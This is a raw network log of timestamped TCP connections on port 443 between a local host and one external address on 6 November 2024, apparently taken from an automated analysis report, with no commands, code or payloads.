                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.385521889 CET4436211413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.387548923 CET4436211413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.392713070 CET62115443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.392729998 CET4436211513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.393004894 CET4436211513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.399513006 CET62114443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.403141975 CET62115443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.443341017 CET4436211413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.447321892 CET4436211513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.531311035 CET4436211413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.531389952 CET4436211413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.531445980 CET62114443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.532134056 CET4436211513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.532371044 CET4436211513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.532427073 CET62115443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.551661015 CET62114443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.551678896 CET4436211413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.551688910 CET62114443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.551695108 CET4436211413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.556016922 CET62115443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.556037903 CET4436211513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.556051016 CET62115443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.556056976 CET4436211513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.559875011 CET62119443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.559906006 CET4436211913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.559982061 CET62119443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.560158014 CET62119443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.560172081 CET4436211913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.560841084 CET62120443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.560880899 CET4436212013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.560933113 CET62120443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.561034918 CET62120443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.561045885 CET4436212013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.974468946 CET4436211613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.974551916 CET62116443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.975838900 CET62116443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.975846052 CET4436211613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.976157904 CET4436211613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.976926088 CET62116443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.983170986 CET4436211713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.983268023 CET62117443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.984347105 CET62117443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.984353065 CET4436211713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.984606028 CET4436211713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.985235929 CET62117443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.999711037 CET4436211813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.999838114 CET62118443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.000833035 CET62118443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.000839949 CET4436211813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.001108885 CET4436211813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.001760960 CET62118443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.019330025 CET4436211613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.027334929 CET4436211713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.043350935 CET4436211813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.100842953 CET4436211613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.100903988 CET4436211613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.100977898 CET62116443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.101241112 CET62116443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.101258039 CET4436211613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.101269007 CET62116443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.101277113 CET4436211613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.104221106 CET62121443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.104235888 CET4436212113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.104315996 CET62121443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.104470968 CET62121443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.104480982 CET4436212113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.111196995 CET4436211713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.111223936 CET4436211713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.111280918 CET62117443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.111290932 CET4436211713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.111371040 CET4436211713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.111417055 CET62117443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.111536980 CET62117443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.111551046 CET4436211713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.111562967 CET62117443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.111567020 CET4436211713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.113780975 CET62122443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.113816023 CET4436212213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.113888979 CET62122443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.114006996 CET62122443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.114022017 CET4436212213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.130280018 CET4436211813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.130342007 CET4436211813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.130392075 CET62118443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.130534887 CET62118443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.130546093 CET4436211813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.130558014 CET62118443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.130563021 CET4436211813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.132575989 CET62123443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.132590055 CET4436212313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.132663012 CET62123443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.132780075 CET62123443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.132790089 CET4436212313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.291450977 CET4436211913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.292016029 CET62119443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.292041063 CET4436211913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.292496920 CET62119443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.292501926 CET4436211913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.369862080 CET4436212013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.388300896 CET62120443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.388329029 CET4436212013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.388788939 CET62120443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.388796091 CET4436212013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.436449051 CET4436211913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.436518908 CET4436211913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.436578035 CET62119443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.436861038 CET62119443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.436877012 CET4436211913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.436887980 CET62119443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.436893940 CET4436211913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.439685106 CET62124443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.439717054 CET4436212413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.439804077 CET62124443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.439956903 CET62124443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.439973116 CET4436212413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.523937941 CET4436212013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.524311066 CET4436212013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.524358034 CET4436212013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.524365902 CET62120443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.524419069 CET62120443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.524478912 CET62120443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.524491072 CET4436212013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.524502039 CET62120443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.524507999 CET4436212013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.526999950 CET62125443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.527030945 CET4436212513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.527116060 CET62125443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.527241945 CET62125443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.527254105 CET4436212513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.828653097 CET4436212113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.829272032 CET62121443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.829288960 CET4436212113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.829791069 CET62121443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.829796076 CET4436212113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.841578007 CET4436212213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.842065096 CET62122443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.842092991 CET4436212213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.842454910 CET62122443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.842468977 CET4436212213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.898328066 CET4436212313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.898850918 CET62123443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.898938894 CET4436212313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.899530888 CET62123443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.899535894 CET4436212313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.959031105 CET4436212113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.959095955 CET4436212113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.959150076 CET62121443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.959343910 CET62121443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.959362030 CET4436212113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.959372997 CET62121443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.959381104 CET4436212113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.962330103 CET62126443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.962388039 CET4436212613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.962481022 CET62126443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.962647915 CET62126443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.962667942 CET4436212613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.969223976 CET4436212213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.969319105 CET4436212213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.969367027 CET4436212213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.969373941 CET62122443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.969434977 CET62122443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.969468117 CET62122443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.969482899 CET4436212213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.969491959 CET62122443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.969497919 CET4436212213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.972312927 CET62127443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.972353935 CET4436212713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.972433090 CET62127443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.972605944 CET62127443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:12.972624063 CET4436212713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.037621021 CET4436212313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.037699938 CET4436212313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.037794113 CET62123443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.037931919 CET62123443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.037946939 CET4436212313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.037977934 CET62123443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.037982941 CET4436212313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.040652037 CET62128443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.040673971 CET4436212813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.040765047 CET62128443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.040914059 CET62128443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.040926933 CET4436212813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.181152105 CET4436212413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.181555033 CET62124443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.181588888 CET4436212413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.181998014 CET62124443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.182003975 CET4436212413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.254338980 CET4436212513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.254849911 CET62125443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.254873037 CET4436212513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.255327940 CET62125443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.255333900 CET4436212513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.312185049 CET4436212413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.312266111 CET4436212413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.312315941 CET62124443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.312475920 CET62124443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.312494040 CET4436212413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.312506914 CET62124443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.312511921 CET4436212413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.315417051 CET62129443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.315469980 CET4436212913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.315550089 CET62129443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.315706015 CET62129443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.315721035 CET4436212913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.382463932 CET4436212513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.382534027 CET4436212513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.382582903 CET62125443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.382688046 CET62125443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.382705927 CET4436212513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.382715940 CET62125443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.382723093 CET4436212513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.384737015 CET62130443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.384766102 CET4436213013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.384834051 CET62130443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.384943008 CET62130443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.384954929 CET4436213013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.681981087 CET4436212613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.682498932 CET62126443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.682540894 CET4436212613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.682974100 CET62126443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.682981014 CET4436212613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.721563101 CET4436212713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.722045898 CET62127443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.722069979 CET4436212713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.723274946 CET62127443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.723282099 CET4436212713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.768438101 CET4436212813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.769329071 CET62128443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.769352913 CET4436212813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.770155907 CET62128443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.770162106 CET4436212813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.810792923 CET4436212613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.810826063 CET4436212613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.810868979 CET4436212613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.810884953 CET62126443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.810928106 CET62126443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.821415901 CET62126443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.821445942 CET4436212613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.851699114 CET4436212713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.851783991 CET4436212713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.851840973 CET62127443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.874597073 CET62127443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.874627113 CET4436212713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.874639988 CET62127443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.874646902 CET4436212713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.877907038 CET62131443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.877960920 CET4436213113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.878053904 CET62131443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.882343054 CET62132443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.882381916 CET4436213213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.882467031 CET62132443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.882541895 CET62131443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.882563114 CET4436213113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.882638931 CET62132443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.882649899 CET4436213213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.897403002 CET4436212813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.897499084 CET4436212813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.897561073 CET62128443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.900804996 CET62128443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.900821924 CET4436212813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.926485062 CET62133443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.926532984 CET4436213313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.926609039 CET62133443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.927078962 CET62133443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:13.927094936 CET4436213313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:14.047245979 CET4436212913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:14.052196980 CET62129443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:14.052216053 CET4436212913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:14.052722931 CET62129443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:14.052726984 CET4436212913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:14.127774000 CET4436213013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:14.128242016 CET62130443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:14.128257990 CET4436213013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:14.128875017 CET62130443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:14.128880978 CET4436213013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:14.177531958 CET4436212913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:14.177571058 CET4436212913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:14.177619934 CET62129443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:14.177644968 CET4436212913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:14.177764893 CET4436212913.107.246.45192.168.2.5
